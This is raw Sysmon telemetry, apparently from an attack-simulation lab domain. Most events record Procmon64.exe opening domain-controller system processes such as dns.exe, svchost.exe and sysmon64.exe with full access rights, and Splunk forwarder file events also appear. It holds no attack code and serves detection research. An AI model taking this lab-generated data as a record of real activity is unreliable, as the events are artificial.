10:55:46.579{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.526{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.526{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2D00-000000003802}2496C:\Program Files\TightVNC\tvnserver.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.494{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2D00-000000003802}2496C:\Program Files\TightVNC\tvnserver.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.494{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.426{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.426{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.379{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.394{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.379{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.363{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.363{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.363{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.363{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.310{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.310{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.210{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.210{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.127{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.127{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2700-000000003802}2948C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.111{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0AE873BED2673AE8A97004A7422293F,SHA256=19255AA642AD82B02423B655A4CC334BDEC13FDD3761C544B1066E331437D312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.111{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2700-000000003802}2948C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.096{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2600-000000003802}2884C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:46.113{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:46.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=124BF06C8DC6BF104046A9670C429662,SHA256=8178F6063F12B62CE53FD9F56D60C528B7CC65DA4E220DF952BEA8AC1320C376,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:46.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=46112ED1A95308DC6C7ED64B4EAD4F35,SHA256=6F21B6B03173632C8BF6703549FA6F5C308D84346BB5E33B174BC798CF060B5A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.926{4F8D34B0-12B3-6216-7D04-000000003902}31361080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12B3-6216-7D04-000000003902}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:47.723{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-12B3-6216-7D04-000000003902}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 